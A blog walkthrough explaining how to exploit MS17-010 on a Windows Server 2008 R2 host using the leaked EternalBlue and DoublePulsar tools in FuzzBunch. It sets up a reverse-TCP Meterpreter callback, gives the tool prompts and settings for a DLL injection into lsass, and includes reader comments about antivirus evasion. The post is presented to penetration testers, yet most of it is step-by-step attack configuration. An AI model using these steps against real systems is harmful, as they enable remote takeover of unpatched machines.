by James Smith

Exploiting MS17-010 – Using EternalBlue and DoublePulsar to gain a remote Meterpreter shell

[su_heading align=”left”]This walk through assumes you know a thing or two and won’t go into major detail. After all it’s meant for fellow researchers and penetration testers.[/su_heading]

Findings so far…

Findings from using these tools are the following so far

[su_note]The default process that Doublepulsar injects into is ‘lsass’ It was observed that whilst testing against Windows 2008 R2 SP1 that this caused the ‘lsass’ process to become unstable over time and resulting in some cases in a BSOD.[/su_note]

  • No domain is needed for the tools to work.
  • An active user session is also not needed.

Fuzzbunch setup

Firstly we need to setup our environment for the ShadowBroker tools to run in.

In my case I created a Windows 7 VM for the task.

Prerequisites for this exercise are

Once your environment is setup and you have downloaded the ShadowBroker archive, unzip it to a path of your choice.

In this instance I chose the root of the C: drive.

We then need to edit a few of the files to work with our environment as on first run you will receive various error messages.

Firstly we need to edit the “” file located in the /windows folder and comment out the line below.

Save the file and open up “Fuzzbunch.xml” you now need to change the “ResourcesDir” and “LogDir” path to match that of your environment.

Note: If there is no log directory then please create it and add the path.

We should now be ready to run the Fuzzbunch tool.

Launch a command prompt and navigate to the /windows folder inside the ShadowBrokers folder.

Type the below command and hit return.

FuzzBunch should now be running in your command prompt like the below screen shot.

Listener and Payload

Now, we need to setup our Linux attack box.  For the purpose of this post I’ll be using a Kali rolling VM with Metasploit installed.

Let’s go ahead and launch Metasploit, create a DLL payload and listener.

The target I am attacking is a x64 Windows  Server 2008 R2 system. So I setup the following payload and saved it as shown in the screen shot below.

Now for the handler a x64 reverse tcp meterpreter.

We’ll run the handler and move on to the next step.

OK, the payload you created needs copying over to the virtual machine where FuzzBunch is sitting and waiting.

Back to Fuzzbunch

Let’s return to our Windows VM.

We can now start entering our details into the FuzzBunch tool.

For most settings we can accept the defaults, the ones that we do need to change are below.

[?] Default Target IP Address [] : Your Target's IP
[?] Default Callback IP Address [] : Your VM's IP
[?] Use Redirection [yes] : NO
[?] Base Log directory [c:\logs] : Input your log path
Index     Project
-----     -------
0         Create a New Project
[?] Project [0] : 0
[?] New Project Name : Give your project a name

Now our initial variables are set you should now be at the fb prompt.


Launching the exploit plugin

Launch the EternalBlue module.

use eternalblue

Again, we can accept all defaults except the below.

[*]  Mode :: Delivery mechanism

    0) DANE     Forward deployment via DARINGNEOPHYTE
   *1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1

Change the above from it’s default setting of “0” to “1”, you can then execute the exploit, (Some details from my test have been redacted for security).


Injecting our DLL payload

Now the tool has created the backdoor onto the vulnerable system we can now move on to running DoublePulsar which will inject our DLL payload.

use doublepulsar

Once again we can accept most of the defaults, just change the variables below.

[*]  Architecture :: Architecture of the target OS

    0) x86     x86 32-bits
   *1) x64     x64 64-bits

The above setting defaults to x86 and will need changing to x64.

[+] Set Architecture => x64

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on diskisk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] :

We need to select option “2” so that we can use our newly created DLL payload.

Next we need to enter the path to our DLL file

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : PathToOurDLL

All other variables can be left at their default value and you can proceed to execute the plugin.


Hack all the things!

If everything has been successful you should should now have a Meterpreter shell waiting on your attack box.

[su_note]If you don’t have a shell yet then something has obviously gone wrong, check your steps and leave a comment and I will try and help you through it.[/su_note]


22 thoughts on “Exploiting MS17-010 – Using EternalBlue and DoublePulsar to gain a remote Meterpreter shell

    1. Hi JC, I am still investigating what causes the lsass process to crash. It could be due to other pieces of software/services running on this particular host.

  1. Thanks , do you use any kind of encoder to evade antivirus software? And can this exploit be used against other processes or only against lsass?

  2. Only Darkpulsar available, there is no doublepulsar.
    Have use may git sources of fuzzbunch, some even don’t have the option of the Eternalblue itself !!! Please help

    1. Hi, after writing this article a metasploit module was created which works very well. There shouldn’t be a need to use the original tools anymore. Hope this helps and thanks for reaching out!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.